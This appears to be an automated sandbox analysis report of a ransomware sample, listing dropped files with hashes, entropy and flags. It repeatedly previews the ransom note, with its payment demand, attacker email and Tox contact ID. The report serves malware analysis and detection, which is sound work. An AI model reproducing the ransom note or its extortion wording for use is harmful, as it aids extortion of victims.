                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):664
                                Entropy (8bit):7.631467939639301
                                Encrypted:false
                                SSDEEP:12:xuVbsYCWw14eNR1PcrSOGJ9fuyAWKj0hOJNuauDZMK5mg/2lWOZOs9NXzku:xqbz/wpDyYPGTNj0hOHAVMJg6WXs9R
                                MD5:AFB7F2A0A80F3EDC66547A5A75404FE2
                                SHA1:05C80EA77275446A9AD195F676F6196C88ECDE15
                                SHA-256:D71451C54269270450E50049FBF4EF612A3386721AC98FE9FC5BAC975FC8EF1B
                                SHA-512:63676FC458BEFC7B79871777DA3C676E78DA1CBA9B3C0A9DBD9FD9F25E3B0480F32CB93FA8A0903FCFE854E4BD4828C5D15B92A55721C0A0AD80FFD277ABFC88
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):957531
                                Entropy (8bit):6.9462170581160505
                                Encrypted:false
                                SSDEEP:12288:OCdYnv+0yKb9a2LtVoiYEN5eNS3rjZpNlBsZACAaiYtJ+KQ:OCdYnvnhtVojENUNYJRqKNVYjQ
                                MD5:7FBB29A6FD4C0C2B315095ED890BF113
                                SHA1:9EF79E9A8E5AD34FFF724326A398D8A987F29832
                                SHA-256:B2C3A2E0B94F6245FBA061156377D2D182A52644C783F97275354F4AA8794097
                                SHA-512:90E23588E84647CFEFE8A137F1B15E8C83F471B53A3C487A1E3B60C590FB1DF6931DCAA653A86113006CF4040008B3956CF1FEE1DAEB4C5B3E0082637DB56C7A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):123332
                                Entropy (8bit):7.998743784494614
                                Encrypted:true
                                SSDEEP:3072:Rh30YPzWp+n0xUC6H2rxRZEBE/yykOze1b7D5bI4YB6:fkYbWplUVWrxR4ckOzIU6
                                MD5:36973C84B92D480218179D65882EB4E7
                                SHA1:FC1EC1CCE74F225C2BAB4222DB67807E17396E47
                                SHA-256:4B4AD29B53A483D89F8DED8FAC2A3D9074C73AE005C634D601175729007E9958
                                SHA-512:041908DE1C2139F3DBA33BB77E52494AA778B6C1C6F02A2871E5C58B98DEC429FCA76D9616D2370E4A9320A89633CB13A9FB83B0654C5EF935939E2852CC979E
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):574879
                                Entropy (8bit):7.4128984671385965
                                Encrypted:false
                                SSDEEP:12288:cYPid0Ya9+zrfx5l+qU67FYWg+YWgYWeoXqgYSqYQh2f/m5NwaHkSIJHvWQ6Q7o9:cYqdza9Krfx5l+qU67FYWg+YWgYWeoXw
                                MD5:59B870ABDE86B6D7561CFE135185A400
                                SHA1:22694627B5F29A75F5A54684EF11833CF7AC9479
                                SHA-256:E69A23BB3F50355B5446E6DA0E2CC272D24D91CEC1384C8265C2DBACB6FD0867
                                SHA-512:A286BB19A7B69EE2A98B1415079E11275FFC3E710DCA9F9561156CA40BF73B1C4366F306CE32535D3005214943A0BFF9870F272648F53B04AB253CD82B0F18A2
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34526
                                Entropy (8bit):7.9945329385042125
                                Encrypted:true
                                SSDEEP:768:RBTqjwOEDasOaNYmm1MWjlzBIHFKdexPAmpqpC51Hv:R2qGHcYeWjZ3gxkYP
                                MD5:EFAD53837D78671D0F5A0172242812BF
                                SHA1:2A9EE651E913F77FB167C58394050F38DF228AEB
                                SHA-256:E38331B04D6D9B26C54145507AB3D71815FD4D8A244BB7F2FD2F622328F8AB3D
                                SHA-512:D6409AD7E4F461652177CE5D5C2BA6EC43E7EC0AB8731B5A5FF20F3760649467B6E455ADDC085A43CD10C9F9CBC03C4593495081B03536135076310DD48704DA
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1790929
                                Entropy (8bit):6.8459507684295735
                                Encrypted:false
                                SSDEEP:12288:KVy4Mo70l8djm0Ru1G7Yc/oUu4BrOp66Xe2bmfi4yRPwkC3Dc0nNXHA5LyIhIhJ:KVy7o7/tR4G77u49OpTnbUeJCAsCy2I3
                                MD5:07299C9F08C41BC09DAE4C8D6D5B544E
                                SHA1:869501374AEC16076FEF5E4D0B711A69E8EEA973
                                SHA-256:41CA171AFEB6FDFCFDBD4667753A34C96C52DAE0AF0E0E6C62A3E8EF5ED2BFB1
                                SHA-512:8BFA66C84A2C1F35106540EABD9436997ECCB1F21018ED2E858C5DEF6BA4646A0A29097C9405AA97A44A2AC27ECD19744AFE8B34AA24F3F81F0C45BA1E72F944
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4834
                                Entropy (8bit):7.954143588502139
                                Encrypted:false
                                SSDEEP:96:nz8F43Czajp58FwL9tooXgGW+GvNbkY5NMMeKGzCdGevuAVOvA:nwF4ZTSw4OgGYFjN7eFGw+VOvA
                                MD5:6F5C8EE85BA36B2FA04276EE73F8239D
                                SHA1:049D10085A86597C309F2FE4C762227D750DB5B3
                                SHA-256:B11DF0A06FD492A2ADA95902952351A71802522932BE736920BAF3D709D81768
                                SHA-512:3612CCF0F1923C24F907156577A7108D83CC27DD3DFC10CDCD2E17F0BD52D94CEDD4829C1E79B94009D02E3D563270E481AF43F02118D0BD227CE49ABCA4E797
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3063
                                Entropy (8bit):7.944445303369046
                                Encrypted:false
                                SSDEEP:48:etR9+jiI7We7rL7Q69t176qYd0jcYOb64Q51mbsSpdlK2+kv4/IhNqjAQHBlp/W4:q22IWoQ69tLwWcYOb6312sS/skvJ7qA0
                                MD5:90E7CC6A7F06415748913FCD34C3ACC7
                                SHA1:AC51565ED6160248DB34E443B7069EDAAFC15DA4
                                SHA-256:ED060DA27071FC964440C16A4B67489E496ACE3DED6E3B97D9FA4A27DCCB1681
                                SHA-512:7862524A77345891739F7D59969D3BFE5316FD6EEAF5F8600323B0F02CDF05CEC6CD089B5DA09712ADB6B492C008F8992E43D0222203A64411CB987E9193B33F
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):990
                                Entropy (8bit):7.77280451964711
                                Encrypted:false
                                SSDEEP:24:1RqPIWc6DN/mHhgmz/wpDyYPGTNj0hOHAVMJg6WXs9foQ:OPIWREhgG/WyYu+MAVMJg6TR
                                MD5:C0331714E410237DAE63A4FF1B436053
                                SHA1:6DD35CFB2045FDEC94E07F56A99FC4E06A16AB3A
                                SHA-256:1FDD59359821EA5F1C6C367A4FF0F2C484B7681F5CC80080502EB4FFEBC93FFC
                                SHA-512:87E426CC50EB685E0CC2F74D484B52B69D3E0BBBDCC78344F89E8314FB692D1E2929A01597C99424BB11A35AC2732B3E00AA8E0594BAF7705CF218409487B8AC
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2734
                                Entropy (8bit):7.932272661252192
                                Encrypted:false
                                SSDEEP:48:QVxFqR9/a57HYPkSYN4tvfwg838HBoSaBqdevsaueEJvv70fMcYJ+t6y/WyYu+Mr:XR9C5rMjwehixEav4vv7OYJ+tdevuAVo
                                MD5:81005A9D5586940456AE2B8EB56D0B6E
                                SHA1:C58744D86B3A4146DB245A232606083C511DD5FC
                                SHA-256:7E9F1C1B1269961C95D72F46938BD0A25F8A633C01C42596335089BB6CA125B4
                                SHA-512:C8D179C366F2CF5FACE3847B8787763280786CE624EF6DEF4E884A89138FD8A1AEBEE68081C113D06F5D2D06233572725C4DE1C99D064774DD59763E8261F1D3
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5960
                                Entropy (8bit):7.964383265374068
                                Encrypted:false
                                SSDEEP:96:1Kyk9J0+L8NMiAjT2YzSR7tLwtqL935FpLsyi6CvLiGpZH5eWeV5I9evuAVOl:1TklLYMtjTZzS/LwtW93Ty/67mZeo+VQ
                                MD5:8B427CE184C8DDB058E23A5549F26A7F
                                SHA1:2E668B1B446C6E4D8A6CDF7E53D158D0AD02679A
                                SHA-256:A44630A34767E7D704DCB654042B53D34E1A0B2CEAC9389E823D79B7158D9376
                                SHA-512:71D05D4DF2FBD3ABC5F073FAC378952E903405A4F84632A5DBE335A03A3E64A5AAB1C13FAA52BD32577ED1670FEA9E34FF1229432C826E9ED01B4C06C5CA0C0E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1925397
                                Entropy (8bit):6.886058879417841
                                Encrypted:false
                                SSDEEP:12288:6yKVNV4ajgNA8T33jVQSWUNZU4sVa7pm8gP+/G5jyvspP8+swnaCG:VKVP4GgNZP5PZQGm8lG5lSQaf
                                MD5:5FDE12316964103B34259CBAC940CE88
                                SHA1:535DED448C7759FDA1BAE748C16D8C6661B839BF
                                SHA-256:31A8A50E7E9A203ED3DB70E94E3BC1F3D07CCB42D0A86BBF292251D6137ADE5E
                                SHA-512:BE8284A1D98D41CB5243CC32A5BD112258FE61EBD183253E4BF648976EEFB342A7639A8F2D71CE53070133DC3BE1936A0FF9AD159814695857FF9E88F7FD2664
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3404
                                Entropy (8bit):7.9385087438793
                                Encrypted:false
                                SSDEEP:96:CxK4e0jT+EoTP1z9IqjPpbeNExpRRjd5Mic1mevuAVOb:qK4eCT+3TP1ZhpbeN4pPjwzm+VOb
                                MD5:4B7E66843B2838CAF18D58025363EE38
                                SHA1:5494F0DCDB3A54801CD18963CBCFFBDEA46F4EA4
                                SHA-256:6879F99E7CFB772D914C55BE74358E5F4E5BD2B26D5779DCD6BBFB28523AF679
                                SHA-512:34308D4511A2FCE5EAEC2FC59639981DFB474930A158CD81EF0CC7C3AA4EEAA19AA7CA5F0ED908991AB0FB8696993724BB22EAB7C97FF3702A773F799877EBD2
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11001
                                Entropy (8bit):7.980715298963405
                                Encrypted:false
                                SSDEEP:192:e+RVzkU8d4lW3AW13V2UnVbZnh8xgQOWXAkQ+f7eNjZ7RqbTWx/+VOh:xCgAZ131VNh8yL1kQ+fihZ7kbC+VOh
                                MD5:3ED512D3C876C7BE8568373149A483C0
                                SHA1:20B1D3527E9D5132A832788D9917B801A6A67FA0
                                SHA-256:15A8C3A67411D4D0CC923DF7C2849BBAD416F6178E305F1691D80B90B51EA18F
                                SHA-512:CA752D6FE9E67F96156CC8EF1ADF410A81242D2B806F8616D0F1E287347F149E47B9FDA8E60DFE92C4643A0496A032A924B6874BA1291F07816A49CF10EC0890
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3548406
                                Entropy (8bit):6.798143809423666
                                Encrypted:false
                                SSDEEP:49152:+4zJYGPpxjOBAS++jqWr739qhgO587exNJrGAhiDwthCHJu9r2JcaD4oc2HmtjLS:+b19T1P2YqSKlOeu
                                MD5:25A311C95078B93CC42F6531D3A612A1
                                SHA1:00DABEB03D68B501CBCD2EB7A8ADD4ABEE9C7FF1
                                SHA-256:84FA49B89AAB47DC8B3469F4B3693A6EA9D6CC7D81EB4B643D70E922E5B7E5DA
                                SHA-512:F16E3950475A374C6C938523CDAFBCB288F082A38E5BA17C11898251713D4F18C2A433DC0B963E47863BD814DC74D38FAED358366CF5CA99A009EE5AAC3A760D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):55854590
                                Entropy (8bit):6.820564324964731
                                Encrypted:false
                                SSDEEP:786432:9zSLP+/BSlfldU/7GGmAhAIQ9r5t2UQ6q6px4bx:lIP+6U/7GFAdrx
                                MD5:869B1F15E03E8EDD404CCAEC44BCBA87
                                SHA1:6C0890CFEF4731FA1EA2B8AF0F5F7F6DDFDA9BD8
                                SHA-256:C4B4BEEC90E7FB6C2836777BBC01B7DEE0F69E4D229B5B1A98064BEFE569D2C8
                                SHA-512:03C7B53CF5F54141A931DDDFD4B2FAA59A6490F811EAD4949EBA75FC10504316DF90D52396F5073DB3B16A7F3C3FE134ABF3FEDCC54B547BA45764A9874992B2
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1818
                                Entropy (8bit):7.8802743426051345
                                Encrypted:false
                                SSDEEP:48:YY7YuGUJ2ugW0O8Z6nhL/0X/WyYu+MAVMJg6Tc6:Y4YGMZy5/yevuAVOc6
                                MD5:79D70B8B66A730B1EE3B63A2C2F1CD7C
                                SHA1:2565559F82A98DA019593C7D614385D554D16DC9
                                SHA-256:BCBC2BB3D8BD42D717BB00BBB076F5CC1627AE0DE78F71D7B4C81A7FF5E38D7D
                                SHA-512:2235846324DF0B96F488B1B54D434533CAA4EC85981AC45664FA406B7B62CDE31A9D0CAC0C0B2E479EC691E6F6B5A4E254530945C59228DD80489CF98B990BF0
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104393
                                Entropy (8bit):7.9983503100924604
                                Encrypted:true
                                SSDEEP:3072:JqMW1NVo9+bv/m5hc/N0j+uINdBz/RCRplclIOPeL3:It13MYv/JN0qVaOPm3
                                MD5:2CADB11EA3B61985BE6A61D9C3F1E877
                                SHA1:4BAFE242019826DFA83D6A8E254CFA89D88BE65D
                                SHA-256:A8276D7300997C5E99FD732ADEE53614ED65054B493C2935BBE21F02826470F7
                                SHA-512:952AF17E65B45E28706E0504CEACAB354A2F2C60EC5C9A4C004546A45E8E48175E760BCC8C0483F09A970F73CDE80126A606524B3A1D915B9DD4C92C07DB4119
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10185
                                Entropy (8bit):7.979443429815771
                                Encrypted:false
                                SSDEEP:192:dPNgptijU5m2I1XFUipy5uj4itteg3WA7lQm0qcCjk9GgG4ZgiH2ZOrlxN+VOCk:dPwtRTI4aygj4ibm4lQmgCjzgG4ZgiHF
                                MD5:C4991D942E9BFD2F3A5EF0CABA9A3939
                                SHA1:11130913927AA9838276DEA9CA1CF9FF979640DC
                                SHA-256:262A6BF82769A0E9DC1CA074968AEA74B12B467DFA589C36F83EABDA47AB4109
                                SHA-512:B2646DED61A0DFAA86FD41A26CA0DFCA9DB0546E504C1E92061A5983141C05B95EE811B0855B4C1FDF668CE57DFFED2C3DAF5960DE8EBF09C9120D6163D2CC7E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):41900
                                Entropy (8bit):7.996471724365494
                                Encrypted:true
                                SSDEEP:768:oRhNucqUX4BY485ghCg8ub3igCLGw2zjg920xvJmc1Gd+SBkbguNtB:oRZlXh485ghzegC0gs0xvJnGxB0/
                                MD5:A15CA187BE4366D15C4BDA96B7ADBE16
                                SHA1:769CAB5AD42189790DCC5247B2224E2467097338
                                SHA-256:AB149892ECCEC18837C91F75E5D1ABE8210AB356248E4F86DFD08D78EFCB8691
                                SHA-512:AC3805D87C1737919F60D7D9ABD3A5A6CB39C3240477FA335BEA494B313BA68EFD5AB6D3343850A95F3DB243CF51F51F9E9899FC6FC0B775EB9AA3C566E8F450
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3853
                                Entropy (8bit):7.948437641226424
                                Encrypted:false
                                SSDEEP:96:MkG+vsghAhLdF8wDQeT+/G6e6bQ7jyvOqAevuAVOB:pkghkBF8IH6G6e6EsM+VOB
                                MD5:7A27801891A38F95361895D384360272
                                SHA1:F8E225FED54B8AE7B8813EE25000E010D90410B4
                                SHA-256:E84562CF35CCC3C16A2E228AF45E7159E5003E35A28645B4BCEB6E81C21F2F4B
                                SHA-512:2FF3386BBAACE820B3CDBF1E9CEFD009142B99F92B8294B81260542E84B344C739669629946D1E4CDB84F87CC03D1314D633187F9C54BB53DEB878F3AB907325
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5036392
                                Entropy (8bit):6.335390285867676
                                Encrypted:false
                                SSDEEP:49152:4d85mmw4RuS5cwD/Sh3NI3CUViwc83NIhvnCtd:4KMmw4EStbnfiTO
                                MD5:D221E3A6F4DE1D4A66FC15B259321A93
                                SHA1:8B275024F028460A06C05FDD1250A2DE905B7EC9
                                SHA-256:093AD744F51B3193E7F36D7306BE6AB0FC7AEF72410EBE8E9CA869C65173E7E6
                                SHA-512:A5AC548F998B87A0DDBC091CFF3A4FF361ACC34053B2C19DC168DBC76029E4D8E3BC363095C084AC5CE76BE58F0350B808B09BA7E5984F99F8BED15C2E409516
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):889
                                Entropy (8bit):7.698642389458632
                                Encrypted:false
                                SSDEEP:24:gDNsDP3EijbF3z/wpDyYPGTNj0hOHAVMJg6WXs9C27:INsDP3Eijx/WyYu+MAVMJg6TX
                                MD5:362E9AB21544B0AC4E68F5EA458433B2
                                SHA1:F070CB4F25F118D3ABDCBBDE9067749502E35A83
                                SHA-256:B138EFC0D4F2A440CB42D31AFD2A2CAE8A11C4BCD0C91A00BF630EDDA66552EA
                                SHA-512:5DCF96AA7A6ECB15103EC8AB25B010483A6992100096099600A691B53A086921CEB6FF1283950D0E1A5CAF8280F5C65A6CB191E2393AA63C06BA613470321659
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5219
                                Entropy (8bit):7.969753279292825
                                Encrypted:false
                                SSDEEP:96:Dh6BO5x+1mAF6L7JsGB301ROufrTSVsLTdEvFrGzVOcevuAVOwO:16sx7JPS3JfrT/FI+Qc+VOwO
                                MD5:D5F2F8A8907DE87F924C46F815488EF9
                                SHA1:B0F04DA8D7CAEA4AAEB39BFC51A7B2695FA90E47
                                SHA-256:336BE0F8470C1DC1CCBAF627CED3EF05B29877E57F3E07D58B871743D5D14788
                                SHA-512:F8D58A317D20DCB7CF71CC4F4C4E57A95B1C4D0D3EFEB07A427E1C32C8CE14A6400CCADBC834244B2BAAA6805D4A10407902CEA5010483E71766DEBAD636F08A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):739037
                                Entropy (8bit):7.952908837104348
                                Encrypted:false
                                SSDEEP:12288:Mz5RboJ3myGhslT8c2fscBNVRFCToZr5RCmUQHr+kRB5fWK66sO/NnnFwYlcgmH:M3bIrGCZ2xBbmsZdRC4Ck9H3p6pgmH
                                MD5:40368EDA6AE3B8354C360537C9D1237F
                                SHA1:AD40A4562D9082CDC011F76C90A7A74B64740619
                                SHA-256:9F0C86D7F9BB8D74E0E03E31BB09F68C74A097D8FF04C63C1ADC69B4FEC7D809
                                SHA-512:720ED4644D9C9295C6331F72989F97A472ABDC7E60056B91788FF58669A1A3DC612C770396F2C25D69FEC745A03E16E40BA94BF4C3EDD5F35E2F291F82860700
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1526742
                                Entropy (8bit):7.978499590623346
                                Encrypted:false
                                SSDEEP:24576:ES9q8w3Tg/ATAJJB+VE3S7yVI+eptWDftSwDwmwDFqCjjqItlu:ESMn3c/AU+8AyVIdrwDgLjWItlu
                                MD5:123FB592E6D8C3EBD968B7A8B0C9C3A7
                                SHA1:646CAC582B15D3694940DDACDF310A4D6C4B798D
                                SHA-256:D2860CA1E7140788F9523979F92508928973976DE9F67C4C45BDEF0E25A5AB97
                                SHA-512:9F8820CBDFEBC497F00CAF260898A6DE6B7C93AA68D50CE35B138527C6BE089130977C95831C30F8355C238BE72E6B14B13760D45C4D2FDEE017032A1F6D722D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3446796
                                Entropy (8bit):7.9611405767191075
                                Encrypted:false
